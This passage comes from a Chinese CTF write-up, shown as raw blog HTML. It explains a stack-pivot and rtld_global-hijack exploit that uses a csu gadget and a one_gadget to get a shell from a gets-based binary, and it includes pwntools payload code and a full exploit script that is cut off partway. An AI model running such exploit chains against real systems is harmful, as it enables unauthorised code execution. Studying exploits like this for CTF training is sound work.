https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638959-\u56fe\u7247-300x71.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638959-\u56fe\u7247-768x181.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638959-\u56fe\u7247.png 1234w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u8c03\u8bd5\u65f6\u53d1\u73b0(\u5728\u6267\u884cgets\u524d),\u6808\u4e0a\u6709\u4e00\u4e9blibc\u7684\u5730\u5740,\u6ca1\u6709\u529e\u6cd5\u8f93\u51fa\u53ef\u4ee5\u60f3\u529e\u6cd5\u628a\u6808\u4e0a\u7684\u8fd9\u4e9b\u6570\u636e\u653e\u5230\u5bc4\u5b58\u5668\u91cc\u8fdb\u884c\u4e00\u4e9b\u64cd\u4f5c,\u4f46\u662f\u56e0\u4e3a\u6808\u7684\u5730\u5740\u4e0d\u53ef\u77e5,\u5148\u8fdb\u884c\u884c\u6808\u8fc1\u79fb\u5230\u5df2\u77e5\u7684\u5730\u65b9<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6ce8\u610f__libc_start_main+128<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"248\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638963-\u56fe\u7247-1024x248.png\" alt=\"\" class=\"wp-image-195\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638963-\u56fe\u7247-1024x248.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638963-\u56fe\u7247-300x73.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638963-\u56fe\u7247-768x186.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638963-\u56fe\u7247.png 1311w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u6211\u4eec\u80fd\u591f\u52ab\u6301rtld_global,\u90a3\u4e48\u5c31\u80fd\u591f\u5229\u7528 <code>add rcx, [r14]<\/code>,\u6211\u4eec\u5229\u7528<code>mov rcx,[rcx+8]<\/code>\u5c06rcx\u5185\u5bb9\u53d8\u6210libc\u7684\u4e00\u4e9b\u51fd\u6570\u7684\u5730\u5740,\u63a7\u5236\u5176\u4e2d[r14]\u7684\u5185\u5bb9,\u5f53\u4f5c\u504f\u79fb,\u6211\u4eec\u5c31\u80fd\u591f\u6267\u884clibc\u5185\u90e8\u7684\u51fd\u6570\u4e86\u4f8b\u5982 ogg<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u90a3\u4e48\u5982\u4f55\u6267\u884c__libc_start_main + 128\u5462<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6ce8\u610f\u5230\u5728csu\u4e2d<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"598\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638969-\u56fe\u7247-1024x598.png\" alt=\"\" class=\"wp-image-196\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638969-\u56fe\u7247-1024x598.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638969-\u56fe\u7247-300x175.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638969-\u56fe\u7247-768x448.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638969-\u56fe\u7247-1536x896.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638969-\u56fe\u7247.png 1614w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f1a\u6267\u884c<code>[r12 + rbx * 8]<\/code>, \u90a3\u6211\u4eec\u8ba9\u8fd9\u4e2a\u5730\u65b9\u7b49\u4e8e\u6808\u4e0a\u7684\u5730\u5740(\u8fc1\u79fb\u540e),\u90a3\u81ea\u7136\u5229\u7528\u6808\u4e0a\u6b8b\u4f59\u7684__libc_start_main + 128\u5730\u5740\u5c31\u53ef\u4ee5\u76f4\u63a5\u6267\u884c\u4e86<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u90a3\u4e48\u5982\u4f55\u52ab\u6301rtld_global\u5462<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u601d\u8def\u4e5f\u597d\u8bf4,\u5982\u679c\u6211\u4eec\u6784\u9020\u4e00\u4e0b\u6808\u7684\u5185\u5bb9,\u8ba9<code>pop rdi<\/code>\u65f6\u8ba9rdi\u7b49\u4e8ertld_global,\u7136\u540e\u60f3\u529e\u6cd5\u8c03\u7528gets\u51fd\u6570\u5c31\u53ef\u4ee5\u4e86<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5f53\u7136\u8fd9\u91cc\u503c\u5f97\u6ce8\u610f\u7684\u7ec6\u8282\u8fd8\u662f\u633a\u591a\u7684,\u7ec6\u8282\u6211\u4eec\u63a5\u4e0b\u6765\u6162\u6162\u8bb2<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u4ed4\u7ec6\u5206\u6790<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u7531\u4e8e\u6211\u5199\u7684exp\u5bf9\u540c\u4e00\u5757\u5185\u5b58\u8fdb\u884c\u4e86\u53cd\u590d\u64cd\u4f5c,\u5982\u679c\u9700\u8981\u590d\u73b0\u662f\u9700\u8981\u53cd\u590d\u8c03\u8bd5\u7684,\u5e76\u4e14\u6ce8\u610frbp\u548crsp\u7684\u4f4d\u7f6e,<strong>\u5982\u679crbp\u7684\u4f4d\u7f6e\u9ad8\u4e8ersp,\u800c\u4e14\u76f8\u5dee\u5f88\u8fd1\u5728\u8fd0\u884c\u4e00\u4e9b\u51fd\u6570\u7684\u65f6\u5019\u4f1a\u53d1\u751f\u4e00\u4e9b\u9519\u8bef<\/strong>.\u8fd9\u70b9\u5f88\u91cd\u8981.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u8fb9\u6211\u5c06exp\u5206\u6210\u51e0\u5757,(\u8fde\u8d77\u6765\u5c31\u80fd\u76f4\u63a5\u7528)\u5f53\u7136\u540e\u9762\u4f1a\u653e\u603b\u7684exp<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u9884\u5904\u7406\u4e00\u4e9b\u5185\u5bb9<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">from pwn import *<br>libc = ELF(\".\/libc.so.6\")<br>context(os='linux', arch='amd64')<br>#io = remote(\"node2.tgctf.woooo.tech\",30462)<br>io = process(\".\/vuln\")<br><br>#context.log_level = 'debug'<br>def debug():<br>    gdb.attach(io)<br>bss = 0x601550<br>rdi = 0x400663<br>ret = 0x400664<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u9996\u5148\u6211\u4eec\u9700\u8981\u628a\u6808\u8fc1\u79fb,\u8fc1\u79fb\u6808\u80af\u5b9a\u662f\u8fc1\u79fb\u5230bss(\u4e00\u5757\u53ef\u8bfb\u5199\u7684\u533a\u57df),\u4f46\u662f\u8fd9\u4e2a\u6837\u5b50bss\u6bb5\u4e0a\u5c31\u6ca1\u6709\u53ef\u4ee5\u5229\u7528\u7684libc\u57fa\u5730\u5740(\u5168\u4e3a0),\u5982\u4f55\u5904\u7406\u5462<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">payload = b'a' * 0x10 + p64(bss) + p64(0x4005E5)<br>io.sendline(payload)<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u5148\u628arbp\u8fc1\u79fb\u4e00\u4e0b,\u7136\u540e\u8fd4\u56de\u5230<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">.text:00000000004005E5 48 8D 45 F0                                lea     rax, [rbp+var_10]<br>.text:00000000004005E9 48 89 C7                                   mov     rdi, rax<br>.text:00000000004005EC B8 00 00 00 00                             mov     eax, 0<br>.text:00000000004005F1 E8 7A FE FF FF                             call    _gets<br>.text:00000000004005F6 B8 00 00 00 00                             mov     eax, 0<br>.text:00000000004005FB C9                                         leave<br>.text:00000000004005FC C3                                         retn<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540e\u63a5\u4e0b\u6765\u91cd\u70b9\u6765\u4e86<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">payload = b'a' * 0x10 + p64(bss) + p64(0x400480)<br>sleep(1)<br>io.sendline(payload)<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u6211\u4eec\u8fd4\u56de0x400480\u7684\u5730\u5740,\u8fd9\u4e2a\u5730\u5740\u662fstart\u51fd\u6570\u7684\u8d77\u59cb\u5730\u5740,\u4ed6\u4f1a\u9884\u5904\u7406\u4e00\u4e9b\u4fe1\u606f\u7136\u540e\u8fdb\u5165main\u51fd\u6570,\u6b64\u65f6\u6808\u4e0a\u5c31\u5e03\u4e0a\u6211\u4eec\u60f3\u8981\u7684\u5185\u5bb9<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728main\u51fd\u6570\u5f00\u59cb\u65f6,\u6808\u7684\u5185\u5bb9<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"608\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638984-\u56fe\u7247-1024x608.png\" alt=\"\" class=\"wp-image-197\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638984-\u56fe\u7247-1024x608.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638984-\u56fe\u7247-300x178.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638984-\u56fe\u7247-768x456.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638984-\u56fe\u7247.png 1320w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u56e0\u4e3a\u6211\u4eec\u53ef\u4ee5\u52ab\u6301\u7a0b\u5e8f\u6d41,\u800c\u4e14\u53ef\u4ee5\u4f7f\u7528<code>pop rdi<\/code>,\u4f46\u662f\u5982\u679c\u6211\u4eec\u8fd9\u65f6\u76f4\u63a5\u8986\u76d6\u4e00\u4e9b\u5185\u5bb9\u4e3aret,\u57280x6014a0\u5904\u9644\u4e0apop rdi\u7684\u5730\u5740,\u5982\u679c\u6211\u4eec\u60f3\u8981\u7a0b\u5e8f\u8fd4\u56degets\u51fd\u6570,\u5c31\u9700\u8981\u6539\u53d80x6014b0\u7684\u5185\u5bb9,\u5982\u679c\u76f4\u63a5\u8986\u76d6\u4f1a\u628artld_global\u8986\u76d6\u6389\u5c31\u6ca1\u6709\u529e\u6cd5\u4f7f\u7528\u4e86,\u6240\u4ee5\u53ef\u884c\u7684\u529e\u6cd5\u5c31\u662f\u5148\u628arbp\u653e\u57280x6014c0\u5904,\u8fdb\u884cgets,\u8fd9\u6837\u5c31\u80fd\u5148\u628artld_global\u4e0b\u9762\u7684\u5730\u65b9\u6539\u6210\u6211\u4eec\u60f3\u8981\u9884\u671f\u7684gets\u51fd\u6570<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">sleep(1)<br>payload = b'a' * 0x10 + p64(0x6014c0) + p64(0x4005E5)<br>io.sendline(payload)<br>sleep(1)<br><br>payload = p64(0x4005F1) + p64(0) + p64(0x601460) + p64(0x4005FB)<br>io.sendline(payload)<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u6b64\u65f6\u89c2\u5bdf\u5230<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"618\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638994-\u56fe\u7247-1024x618.png\" alt=\"\" class=\"wp-image-198\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638994-\u56fe\u7247-1024x618.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638994-\u56fe\u7247-300x181.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638994-\u56fe\u7247-768x464.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638994-\u56fe\u7247-1536x927.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638994-\u56fe\u7247.png 1819w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e0b\u9762\u5df2\u7ecf\u662fcall gets\u51fd\u6570\u4e86,\u6b64\u65f6\u6211\u4eec\u8ba9rbp\u56de\u6765,\u6784\u9020\u94fe\u5b50<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">sleep(1)<br>payload = b'b' * 0x10 + p64(0x6014a0) + p64(ret) * 6 + p64(rdi)[:7]<br>io.sendline(payload)<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u8fb9p64(rdi)[:7]\u662f\u4e3a\u4e86\u9632\u6b62gets\u622a\u65ad\u628artld_global\u7ed9\u6539\u4e86,\u662f\u8fd9\u4e2a\u6837\u5b50\u7684(\u8fd9\u4e2a\u65f6\u5019\u6808\u5df2\u7ecf\u88ab\u590d\u5199\u7684\u4e0d\u662f\u4ec0\u4e48\u6837\u5b50\u4e86,\u6211\u5f88\u96be\u8bb2\u6e05\u695a\u4e3a\u4ec0\u4e48\u8981\u628arbp leave\u5230\u4e00\u4e9b\u5730\u5740,\u6709\u4ec0\u4e48\u7591\u95ee\u53ef\u4ee5\u591a\u601d\u8003\u591a\u52a8\u8c03\u770b\u770b\u5427)<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"947\" height=\"232\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638999-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-199\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638999-\u56fe\u7247.png 947w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638999-\u56fe\u7247-300x73.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638999-\u56fe\u7247-768x188.png 768w\" sizes=\"auto, (max-width: 947px) 100vw, 947px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">call gets\u65f6\u7684\u5bc4\u5b58\u5668\u6837\u5b50\u548c\u6808\u7684\u6837\u5b50\u5982\u56fe<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"628\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639003-\u56fe\u7247-1024x628.png\" alt=\"\" class=\"wp-image-200\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639003-\u56fe\u7247-1024x628.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639003-\u56fe\u7247-300x184.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639003-\u56fe\u7247-768x471.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639003-\u56fe\u7247.png 1398w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"991\" height=\"217\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639006-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-201\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639006-\u56fe\u7247.png 991w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639006-\u56fe\u7247-300x66.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639006-\u56fe\u7247-768x168.png 768w\" sizes=\"auto, (max-width: 991px) 100vw, 991px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e2a\u65f6\u5019\u53ef\u80fd\u4f60\u5f88\u7591\u60d1,\u6267\u884c\u5b8cgets\u4e4b\u540e\u8981\u600e\u4e48\u786e\u4fdd\u8fd4\u56de\u5730\u5740(gets\u6267\u884c\u540e\u5c31\u660e\u767d\u4e86)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">sleep(1)<br><br>payload = p64(0x601290)<br>io.sendline(payload)<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">gets\u8bfb\u5165\u7684\u5185\u5bb9,\u8fd9\u8fb9\u662f\u5bf9rtld_global\u7684\u5185\u5bb9\u8fdb\u884c\u4fee\u6539,\u8fd9\u4e2a\u5730\u5740\u662f\u7a0d\u540e\u9700\u8981\u4f2a\u9020\u7684\u5730\u5740<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"879\" height=\"229\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639010-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-202\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639010-\u56fe\u7247.png 879w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639010-\u56fe\u7247-300x78.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639010-\u56fe\u7247-768x200.png 768w\" sizes=\"auto, (max-width: 879px) 100vw, 879px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u53ef\u89c1gets\u6267\u884c\u5b8c\u662f\u8fd9\u4e2a\u6837\u5b50\u7684(\u662f\u4e0d\u662f\u5f88\u5947\u602a,\u6211\u53cd\u590d\u52a8\u8c03\u51fa\u6765\u7684\u4e00\u4e2a\u5730\u5740,\u6b64\u65f6\u6808\u5df2\u7ecf\u5f88\u6df7\u4e71\u4e86,\u6211\u4e5f\u4e0d\u597d\u76f4\u63a5\u5206\u6790\u4e86),\u8fd9\u4e2a\u548crbp\u5728rsp\u4e0a\u9762\u6709\u4e00\u5b9a\u7684\u5173\u7cfb,\u4ed6\u4f1apush\u4e00\u4e9b\u5bc4\u5b58\u5668,\u521a\u597d\u6709\u4e00\u4e2a\u5bc4\u5b58\u5668\u5b58\u7740\u4e00\u4e2a\u5730\u5740,\u7136\u540epush\u8fdb\u53bb\u4e86,(\u6211\u5199\u7684\u592a\u4e71\u4e86,\u5e0c\u671b\u6709\u5e08\u5085\u80fd\u6709\u66f4\u7b80\u5355\u660e\u4e86\u7684\u6784\u9020\u6808\u7684\u65b9\u6cd5,\u6bd4\u5982\u8bf4\u4e0d\u8981\u91cd\u590d\u7684\u590d\u7528,\u6bcf\u6b21\u90fd\u8bbe\u7f6e\u4e00\u4e2a\u65b0\u7684\u5185\u5b58\u5757\u4e4b\u7c7b\u7684,\u6574\u4e2a\u94fe\u8c03\u7528\u7684\u8fc7\u7a0b\u662f\u5f88\u4e0d\u9519\u7684,\u4f46\u662f\u6808\u7684\u5185\u5bb9\u5c31\u9700\u8981\u4e0d\u65ad\u52a8\u8c03\u4e86)<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"592\" height=\"36\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639015-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-203\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639015-\u56fe\u7247.png 592w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639015-\u56fe\u7247-300x18.png 300w\" sizes=\"auto, (max-width: 592px) 100vw, 592px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u53ef\u4ee5\u770b\u5230\u6210\u529f\u6539\u5199\u4e86\u8fd9\u4e2a\u7684\u5185\u5bb9<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u63a5\u4e0b\u6765\u5c31\u53ef\u4ee5\u4f2a\u9020\u8fd9\u4e2a\u5730\u5740\u7684\u5185\u5bb9,\u7136\u540e\u6267\u884c__libc_start_main + 128\u4e86<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">sleep(1)<br>payload = b'a' * 0x10 + p64(0x6012a0) + p64(0x4005E5)<br>io.sendline(payload)<br>sleep(1)<br>#debug()<br><br>payload = (p64(-293 - libc.sym[\"gets\"] + 0xebd3f) + p64(0) + p64(0) + p64(0x40065A) + p64(0) + p64(0x6010a0) + p64(0x6014f8) + p64(0) * 3 + p64(0x400649)).ljust(0xa0, b'\\x00') + p64(0x601468)<br>io.sendline(payload)<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u8fb9\u6211\u53c8\u628arop\u94fe\u5b50\u548c\u4f2a\u9020\u7684\u5185\u5bb9\u878d\u5408\u5230\u4e00\u8d77\u4e86<del>(\u6211\u77e5\u9053\u9519\u4e86,\u7ed5\u4e86\u6211\u5427)<\/del>\u4f46\u662f\u8fd9\u4e2a\u5730\u65b9\u590d\u7528\u5728\u4e00\u8d77\u7684\u8bdd\u8fd8\u662f\u5f88\u6e05\u6670\u4e86(\u4e0d\u7b97\u6df7\u4e71)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code>p64(0x40065A) + p64(0) + p64(0x6010a0) + p64(0x6014f8) + p64(0) * 3 + p64(0x400649)<\/code>\u5c31\u662frop\u7684\u94fe\u5b50\u4e86,\u8fd9\u65f6\u53ef\u4ee5\u63a7\u5236rbp\u7684\u5185\u5bb9\u4ee5\u6b64\u6765\u6ee1\u8db3ogg\u7684\u4e00\u4e9b\u6761\u4ef6,<code>p64(-293 - libc.sym[\"gets\"] + 0xebd3f)<\/code>\u662f\u6808\u4e0a\u6709\u4e00\u4e2a\u5730\u65b9\u8bb0\u5f55\u4e86<code>gets + 293<\/code>\u7684\u5730\u5740,\u63a7\u5236rcx\u4e3a<code>gets + 293<\/code>,\u7136\u540e\u5229\u7528add\u504f\u79fb\u6765\u53d8\u6210one_gadget<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8c03\u8bd5\u770b\u4e00\u4e0b\u6548\u679c\u5427<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"650\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639024-\u56fe\u7247-1024x650.png\" alt=\"\" class=\"wp-image-204\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639024-\u56fe\u7247-1024x650.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639024-\u56fe\u7247-300x190.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639024-\u56fe\u7247-768x488.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639024-\u56fe\u7247.png 1227w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u63a7\u5236r12,\u4f7f\u5176\u80fd\u591f\u8fdb\u5165\u5230__libc_start_main+128,\u6b65\u5165\u8fdb\u53bb<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"298\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639028-\u56fe\u7247-1024x298.png\" alt=\"\" class=\"wp-image-205\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639028-\u56fe\u7247-1024x298.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639028-\u56fe\u7247-300x87.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639028-\u56fe\u7247-768x223.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639028-\u56fe\u7247-1536x447.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639028-\u56fe\u7247.png 1794w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728\u8fdb\u884c\u524d\u4e09\u884c\u540e,rcx\u53d8\u6210\u4e86\u6808\u7684\u4e00\u4e2a\u5730\u5740<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6ce8\u610frcx<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"98\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639032-\u56fe\u7247-1024x98.png\" alt=\"\" class=\"wp-image-206\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639032-\u56fe\u7247-1024x98.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639032-\u56fe\u7247-300x29.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639032-\u56fe\u7247-768x73.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639032-\u56fe\u7247.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u90a3\u4e48\u63a5\u4e0b\u6765<code>mov rcx, qword ptr [rcx + 8]<\/code>\u65f6,rcx\u5c31\u662fgets+294\u7684\u503c\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"465\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639077-\u56fe\u7247-1024x465.png\" alt=\"\" class=\"wp-image-208\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639077-\u56fe\u7247-1024x465.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639077-\u56fe\u7247-300x136.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639077-\u56fe\u7247-768x349.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639077-\u56fe\u7247-1536x698.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639077-\u56fe\u7247.png 1635w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u8fb9[r14]\u6211\u4eec\u5df2\u7ecf\u63a7\u5236\u597d\u4e86,\u8fd0\u884c\u5230add\u6307\u4ee4\u65f6<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"415\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639082-\u56fe\u7247-1024x415.png\" alt=\"\" class=\"wp-image-209\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639082-\u56fe\u7247-1024x415.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639082-\u56fe\u7247-300x121.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639082-\u56fe\u7247-768x311.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639082-\u56fe\u7247-1536x622.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744639082-\u56fe\u7247.png 1704w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/53602322\/1744512976269-290ce9f7-7d27-4c03-beb0-4296edb6cfa0.png\" alt=\"\"\/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">rcx\u5c31\u53d8\u6210\u4e86ogg,call\u4e00\u4e0b\u76f4\u63a5\u62ff\u5230shell,\u8fd9\u8fb9\u9644\u4e0aexp<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">from pwn import *<br>libc = ELF(\".\/libc.so.6\")<br>context(os='linux', arch='amd64')<br>#io = remote(\"node2.tgctf.woooo.tech\",30462)<br>io = process(\".\/vuln\")<br><br>#context.log_level = 'debug'<br>def debug():<br>    gdb.attach(io)<br>bss = 0x601550<br>rdi = 0x400663<br>ret = 0x400664<br>payload = b'a' * 0x10 + p64(bss) + p64(0x4005E5)<br><br>io.sendline(payload)<br>payload = b'a' * 0x10 + p64(bss) + p64(0x400480)<br>sleep(1)<br>io.sendline(payload)<br>sleep(1)<br>payload = b'a' * 0x10 + p64(0x6014c0) + p64(0x4005E5)<br>io.sendline(payload)<br>sleep(1)<br><br>payload = p64(0x4005F1) + p64(0) + p64(0x601460) + p64(0x4005FB)<br>io.sendline(payload)<br>sleep(1)<br>payload = b'b' * 0x10 + p64(0x6014a0) + p64(ret) * 6 + 